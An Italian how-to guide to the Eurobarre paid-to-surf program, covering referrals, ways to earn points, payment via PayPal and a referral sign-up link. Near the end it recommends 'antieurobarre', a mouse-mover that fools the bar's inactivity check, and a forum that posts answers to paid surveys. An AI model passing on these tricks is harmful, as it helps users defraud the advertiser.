07- Domande frequenti sul "Parrainage".- La domanda che più spesso ci si pone è: "Esiste un limite massimo di utenti da far affiliare?" La risposta è facile: NO! Si possono affiliare tutte le persone che si vuole.Non è consentito lo spamming, pena chiusura immediata del conto.- Quanto permette di guadagnare un affiliato? E' semplice: un iscritto può farti guadagnare fino al doppio di punti che prima facevi da solo, con due iscritti i margini di guadagno crescono fino ( quasi ) a permetterti di triplicare i punti.- Quanti livelli di affiliazione esistono? Solamente uno ma che permette di farti guadagnare il 100% dei suoi punti ( senza sottrargli niente, è chiaro ). In poche parole non è possibile guadagnare anche i punti del "figlio del figlio".- I punti generati dai sondaggi bonus vinti dai tuoi figli, verranno anche questi versati sul tuo conto? No: solo i punti di surf e i bonus mail sono riversati anche sul tuo conto, i sondaggi sono a carattere personale e non vengono riversati sui conti dei "Padri".- Dove si trova il proprio refereall-link? Ok, è facile: segui la procedura: in basso a destra dov' è c' è l' orologio, fai click col tasto destro del mouse sulla € di Eurobarre; clicka quindi su "Member' s info" ( se hai scelto la lingua inglese, casomai clicka sulla i ); bene, ti si aprirà un menù, nella parte in basso a destra del menù c' è una scritta in grassetto "Inviter mes amis", clicka sotto dove è scritto "Parrainez vos amis par email"; nella nuova finestra c' è un link rosso ( è lui il tuo parrain che ti farà guadagnare figliocci! ). Sotto al link c' è anche un form per inviare mail e parlare del progetto ad amici e parenti.- I tuoi amici, se scaricheranno Eurobarre dal tuo refereall-link, diventeranno tuoi affiliati. Ma come fai a vedere se hai effettivamente affiliato un amico correttamente? Dunque, se qualcuno si è registrato lo potrai sapere istantaneamente clickando col tasto destro del mouse sulla € di Eurobarre e poi andando su "Earnings" dove c' è un' altra €. Dove adesso guardi i tuoi punti totalizzati si aggiungerà un campo che indicherà i punti che ti fanno guadagnare tutti i tuoi figli, potrai vedere anche quanti figliocci hai accumulato ( vedi immagine su! ).08- Come si guadagnano i punti.- Ci sono vari modi per accumulare punti: si accumulano punti stando collegati ad Internet e facendo scorrere le pubblicità sullo schermo ( se si riduce ad icona, il programma non farà accumulare punti di surf ); altri punti si possono accumulare attraverso delle mail bonus che vengono recapitate giornalmente; inoltre esistono numerosi questionari bonus che faranno guadagnare molti punti se le risposte date sono esatte ( il forum sologuadagni.com pubblica continuamente le risposte aggiornate ). Un metodo più recente per accumulare Euro e non punti è quello dei bonus azione, effettuata la registrazione ad un sito voi spendete una piccola cifra necessaria per generare una commissione in favore di Eurobarre che per ringraziarvi verserà sul vostro conto Eurobarre la cifra che avete investito ed un premio in Euro ( quando vi offrono questi bonus, leggete bene le istruzioni se volete maturare il bonus in quanto gli imprevisti possono essere sempre dietro l' angolo! )... Per maggiori dettagli su ogni singolo bonus leggi il prossimo punto.
09- Punti di surf, bonus azione, mail, "enquete" » questionari.- Punti di surf: tutti i punti che hai maturato facendo scorrere banner pubblicitari sul tuo schermo;- Punti bonus email: punti bonus che si maturano leggendo delle mail pubblicitarie spedite da Eurobarre. Il valore di queste mail va dai 50 ai 100 punti, a volte anche 200.- Punti bonus "enquete" » questionari: questi punti bonus li trovi ogni tanto clickando su un avviso giallo e rosso nella pagina dove si vedono i punti accumulati. Le enquete sono questionari pubblicitari che fanno guadagnare dai 500 agli 8000 punti se le risposte che fornite sono corrette ( il forum sologuadagni.com pubblica continuamente le risposte aggiornate );- Punti bonus fedeltà: il conto viene accreditato di 5000 punti ogni 15, 45 e 75 giorni per un totale di 15000 punti. Inoltre ogni anniversario della registrazione viene festeggiato nella stessa maniera!- Punti bonus azione: anche questi punti bonus li trovi ogni tanto clickando su un avviso giallo e rosso nella pagina dove si vedono i punti accumulati. Vengono accreditati dai 4 ai 15 Euro per ogni bonus maturato ( ma attenti a leggere bene le istruzioni nell' avviso, non si sa mai! ).17- Pagamenti e modalità di accredito.- Una volta maturati almeno 15 Euro ( questa è la soglia minima per poter richiedere un pagamento ), segui la procedura per essere pagato: in basso a destra dov' è c' è l' orologio, fai click col tasto destro del mouse sulla € di Eurobarre; poi, andando su "Earnings" troverai la scheda "Paiement", clicka lì! Bene ora puoi compilare la richiesta di accredito seguendo le istruzioni. Verrai pagato tramite paypal, il prossimo punto ti aiuterà se non sai come fare per aprire un conto ( tutto gratuito anche in questo caso! ).Il conto PayPal:18- Registrare gratuitamente un conto PayPal.- E' fondamentale aprire un conto con PayPal ( è gratuito e non c' è alcuna spesa di gestione, ecc. )!!! E non è necessario associare carte di credito e neanche fare versamenti di nessun tipo in favore di nessuno. Avrai a disposizione un deposito bancario onLine con il quale fare acquisti in sicurezza su eBay, oppure sul quale depositare momentaneamente i tuoi guadagni con Eurobarre per poi depositarli sul tuo conto bancario!!!
Per registrarsi su Paypal gratuitamente, segui il link :https://www.paypal.com/it/mrb/pal=UR4QR3LE6D8MJ IMPORTANTE: crea un conto Premier o Business, gli altri non accettano Eurobarre.trucchieurobarre si disattiva automaticamente dopo 5 min di inattività, come risolvere il problema ?, se ad esempio abbiamo il pc acceso 24 ore ma non siamo sempre vicino a muovere il mouse? La soluzione si chiama antieurobarre, scarica la versione 1,1 le altre non sono altrettante valide, questo programmino, dopo 5 min di inattività muove automaticamente il mouse,,, così freghiamo la barra e crede che siamo davanti al pc.

bè detto tutto praticamente non farete i miliardi ma almeno rifarete su il costo dell adsl